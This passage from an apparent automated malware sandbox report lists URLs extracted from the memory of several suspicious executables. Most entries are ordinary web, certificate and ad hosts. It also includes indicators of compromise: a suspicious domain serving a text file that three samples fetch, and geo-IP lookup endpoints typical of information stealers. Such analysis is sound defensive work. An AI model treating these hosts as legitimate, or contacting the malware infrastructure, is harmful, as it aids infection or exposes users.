      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpString found in binary or memory: http://ogp.me/ns/fb#
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1034470755.0000000001762000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.736937101.0000000005D2C000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
      Source: md8_8eus.exe, 00000023.00000003.942943627.0000000003FB0000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
      Source: Browzar.exe, 0000001D.00000003.736937101.0000000005D2C000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
      Source: Browzar.exe, 0000001D.00000003.736937101.0000000005D2C000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmpString found in binary or memory: http://pp.exe/app.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://r3.i.lencr.org/0
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://r3.o.lencr.org0
      Source: YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.967742961.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
      Source: YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.967742961.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
      Source: YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.967742961.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
      Source: YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.967742961.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
      Source: YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.967742961.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)multipart/form-data
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
      Source: md8_8eus.exe, 00000023.00000003.942550444.0000000003F80000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
      Source: md8_8eus.exe, 00000023.00000003.942550444.0000000003F80000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuG4N.img?h=75&w=100&
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuQtg.img?h=166&w=310
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTly.img?h=166&w=310
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuY5J.img?h=166&w=310
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=333&w=311
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvoN9.img?h=166&w=310
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXiwM.img?h=16&w=16&m
      Source: md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB46JmN.img?h=16&w=16&m
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
      Source: md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
      Source: md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: http://support.google.com/accounts/answer/151657
      Source: YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.967742961.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1034470755.0000000001762000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmpString found in binary or memory: http://uyg5wye.2ihsfa.com/
      Source: yevbZfdCqR.exe, 00000001.00000003.654242726.0000000005DE1000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmpString found in binary or memory: http://uyg5wye.2ihsfa.com/fj4ghga23_fsa.txt
      Source: explorer.exe, 00000027.00000000.849354352.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: Browzar.exe, 0000001D.00000003.736218551.0000000008CDC000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
      Source: Browzar.exe, 0000001D.00000002.984505691.0000000000458000.00000040.00020000.sdmpString found in binary or memory: http://www.browzar.com
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/
      Source: Browzar.exe, 0000001D.00000002.1014757833.0000000000825000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/a
      Source: Browzar.exe, 0000001D.00000002.982363790.000000000044C000.00000040.00020000.sdmpString found in binary or memory: http://www.browzar.com/faq?v=http://www.browzar.com/update?v=http://www.browzar.com/problem?v=http:/
      Source: Browzar.exe, 0000001D.00000002.982363790.000000000044C000.00000040.00020000.sdmpString found in binary or memory: http://www.browzar.com/search?SPID=2&q=
      Source: Browzar.exe, 0000001D.00000002.982363790.000000000044C000.00000040.00020000.sdmpString found in binary or memory: http://www.browzar.com/search?q=Time
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmp, Browzar.exe, 0000001D.00000003.736678674.00000000008D0000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmp, Browzar.exe, 0000001D.00000002.1025136728.0000000000861000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000
      Source: Browzar.exe, 0000001D.00000003.736533690.0000000005D04000.00000004.00000001.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000#
      Source: Browzar.exe, 0000001D.00000003.736533690.0000000005D04000.00000004.00000001.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000#E
      Source: Browzar.exe, 0000001D.00000003.736533690.0000000005D04000.00000004.00000001.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000#~
      Source: Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000...
      Source: Browzar.exe, 0000001D.00000003.736533690.0000000005D04000.00000004.00000001.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000....gst
      Source: Browzar.exe, 0000001D.00000002.1025136728.0000000000861000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000...v5
      Source: Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/?v=20002n:
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/?v=20009
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000Browzar
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000C:
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000D
      Source: Browzar.exe, 0000001D.00000002.1022622220.0000000000854000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000MD
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000R
      Source: Browzar.exe, 0000001D.00000002.1014757833.0000000000825000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000cs.com/ga.js
      Source: Browzar.exe, 0000001D.00000003.741127670.0000000008EE6000.00000004.00000001.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000f
      Source: Browzar.exe, 0000001D.00000003.763962133.00000000091E0000.00000004.00000001.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000http://www.browzar.com/start/?v=2000
      Source: Browzar.exe, 0000001D.00000002.1014757833.0000000000825000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000tagead/js/adsbygoogle.jsbrowzar.com;i
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000thod
      Source: Browzar.exe, 0000001D.00000002.1022622220.0000000000854000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000uM
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000ww.browzar.com/start/?v=2000d.cookie
      Source: Browzar.exe, 0000001D.00000002.1022622220.0000000000854000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/?v=2000~
      Source: Browzar.exe, 0000001D.00000002.982363790.000000000044C000.00000040.00020000.sdmpString found in binary or memory: http://www.browzar.com/start/?v=Build
      Source: Browzar.exe, 0000001D.00000003.736363853.0000000008CC6000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://www.browzar.com/start/css/ie7.css
      Source: Browzar.exe, 0000001D.00000003.736363853.0000000008CC6000.00000004.00000001.sdmpString found in binary or memory: http://www.browzar.com/start/css/ie7.cssA
      Source: Browzar.exe, 0000001D.00000003.736363853.0000000008CC6000.00000004.00000001.sdmpString found in binary or memory: http://www.browzar.com/start/css/ie7.cssi
      Source: Browzar.exe, 0000001D.00000003.736363853.0000000008CC6000.00000004.00000001.sdmpString found in binary or memory: http://www.browzar.com/start/css/ie7.cssvM
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://www.browzar.com/start/css/ie8.css
      Source: Browzar.exe, 0000001D.00000003.736760133.0000000005CC8000.00000004.00000001.sdmpString found in binary or memory: http://www.browzar.com/start/css/ie8.cssC:
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/css/ie8.csso
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://www.browzar.com/start/css/screen.css?1=1
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/css/screen.css?1=1.
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/css/screen.css?1=1E
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/css/screen.css?1=1V
      Source: Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://www.browzar.com/start/images/browzar-logo.png
      Source: Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/images/browzar-logo.png#n
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmpString found in binary or memory: http://www.browzar.com/start/images/browzar-logo.pnggoogle.js
      Source: Browzar.exe, 0000001D.00000002.982363790.000000000044C000.00000040.00020000.sdmpString found in binary or memory: http://www.browzar.com/tryagain?u=Unknown
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
      Source: Browzar.exe, 0000001D.00000003.736239537.0000000008D4D000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.737737782.000000000261F000.00000004.00000001.sdmpString found in binary or memory: http://www.google-analytics.com
      Source: Browzar.exe, 0000001D.00000003.736363853.0000000008CC6000.00000004.00000001.sdmpString found in binary or memory: http://www.google-analytics.com/
      Source: Browzar.exe, 0000001D.00000003.736239537.0000000008D4D000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.736678674.00000000008D0000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://www.google-analytics.com/ga.js
      Source: Browzar.exe, 0000001D.00000003.736745824.0000000005CB9000.00000004.00000001.sdmpString found in binary or memory: http://www.google-analytics.com/ga.jsNNC:
      Source: Browzar.exe, 0000001D.00000002.1014757833.0000000000825000.00000004.00000020.sdmpString found in binary or memory: http://www.google-analytics.com/ga.jscs.com/ga.js
      Source: Browzar.exe, 0000001D.00000002.1022622220.0000000000854000.00000004.00000020.sdmpString found in binary or memory: http://www.google-analytics.com/ga.jshod
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmpString found in binary or memory: http://www.google-analytics.com/ga.jsx
      Source: Browzar.exe, 0000001D.00000003.736239537.0000000008D4D000.00000004.00000001.sdmpString found in binary or memory: http://www.google-analytics.com/ga.jszdM
      Source: Browzar.exe, 0000001D.00000003.736363853.0000000008CC6000.00000004.00000001.sdmpString found in binary or memory: http://www.google-analytics.com/qK
      Source: Browzar.exe, 0000001D.00000002.1022622220.0000000000854000.00000004.00000020.sdmpString found in binary or memory: http://www.google-analytics.com/r/__utm.gif?utmwv=5.7.2&utms=1&utmn=1127076985&utmhn=www.browzar.com
      Source: Browzar.exe, 0000001D.00000003.740031293.0000000008EBA000.00000004.00000001.sdmpString found in binary or memory: http://www.google-analytics.comwww.google-analytics.com
      Source: md8_8eus.exe, 00000023.00000003.932319523.0000000003F58000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: http://www.google.ru/?hl=ru&q=illegal
      Source: md8_8eus.exe, 00000023.00000003.942570553.0000000003F90000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/
      Source: md8_8eus.exe, 00000023.00000003.943050951.0000000003E90000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
      Source: md8_8eus.exe, 00000023.00000003.943050951.0000000003E90000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
      Source: jfiag3g_gg.exe, 00000017.00000002.728579676.0000000000197000.00000004.00000001.sdmp, jfiag3g_gg.exe, 00000021.00000002.965805266.000000000019A000.00000004.00000001.sdmp, jfiag3g_gg.exe, 00000024.00000002.970486812.000000000019A000.00000004.00000001.sdmp, jfiag3g_gg.exe, 00000029.00000002.987882908.000000000019A000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net
      Source: jfiag3g_gg.exe, 00000017.00000002.728626975.0000000000401000.00000040.00020000.sdmp, jfiag3g_gg.exe, 00000021.00000002.969839258.0000000000401000.00000040.00020000.sdmp, jfiag3g_gg.exe, 00000024.00000002.970581180.0000000000401000.00000040.00020000.sdmp, jfiag3g_gg.exe, 00000029.00000002.989528470.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://www.nirsoft.net/
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: http://www.search.com/web?q=invalid
      Source: file4.exe, 00000019.00000000.703183273.000000000040D000.00000002.00020000.sdmpString found in binary or memory: http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd
      Source: yevbZfdCqR.exe, 00000001.00000000.638278553.00000000012A4000.00000002.00020000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: https://2542116.fls.d
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
      Source: Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: https://2542116.fls.doubleclix
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: https://2makestorage.comidna:
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: Browzar.exe, 0000001D.00000003.736218551.0000000008CDC000.00000004.00000001.sdmpString found in binary or memory: https://adsense.com.
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/adsid/google/si?gadsid=AORoGNRfxSclVePPTskt_ULwutuxovZBENP6CQBK41sqxH
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/adsid/google/si?gadsid=AORoGNSN_Te_GQT33AAAR6UNrVcn3a-PGny50bSNsHlzoT
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNQXg7AHkvg6J6S0TqGFa_0HynGV3_XxYfs4fLINJG
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNRxRJyZzZp4KXfYTC7Z4q4fsi2jmRa8YGEqdB288n
      Source: Browzar.exe, 0000001D.00000003.736218551.0000000008CDC000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/adsid/google/si?gadsid=AORoGNSvKHbjRugN8Bruw1IrFif72u8bwsJvZ4BRSrMAhil_
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/adsid/google/si?gadsid=AORoGNTzML9SvDOPLAOFxwn751k-3cAoAULy2FWuSRb89C_P
      Source: Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
      Source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
      Source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ipify.org
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpString found in binary or memory: https://assets.tumblr.com
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.746523925.0000000000B26000.00000004.00000001.sdmpString found in binary or memory: https://assets.tumblr.com/analytics.html?_v=9f5febfd57a8a649c598d888f2d9e062#
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpString found in binary or memory: https://assets.tumblr.com/assets/scriptQ
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpString found in binary or memory: https://assets.tumblr.com/assets/scripts/pre_tumblelog.js?_v=b9f848c06fcba7eaf305d4a7cb7a1b98
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.746523925.0000000000B26000.00000004.00000001.sdmpString found in binary or memory: https://assets.tumblr.com/assets/scripts/tumblelog_post_message_queue.js?_v=a8fadfa499d8cb7c3f8eefdf
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.746523925.0000000000B26000.00000004.00000001.sdmpString found in binary or memory: https://assets.tumblr.com/client/prod/standalone/blog-network-npf/index.build.css?_v=a6c4ad40cdc663a
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.746523925.0000000000B26000.00000004.00000001.sdmpString found in binary or memory: https://assets.tumblr.com/fonts/gibson/stylesheet.css?v=3
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.746523925.0000000000B26000.00000004.00000001.sdmpString found in binary or memory: https://assets.tumblr.com/images/default_avatar/octahedron_open_128.png
      Source: Browzar.exe, 0000001D.00000003.736218551.0000000008CDC000.00000004.00000001.sdmpString found in binary or memory: https://attestation.android.com
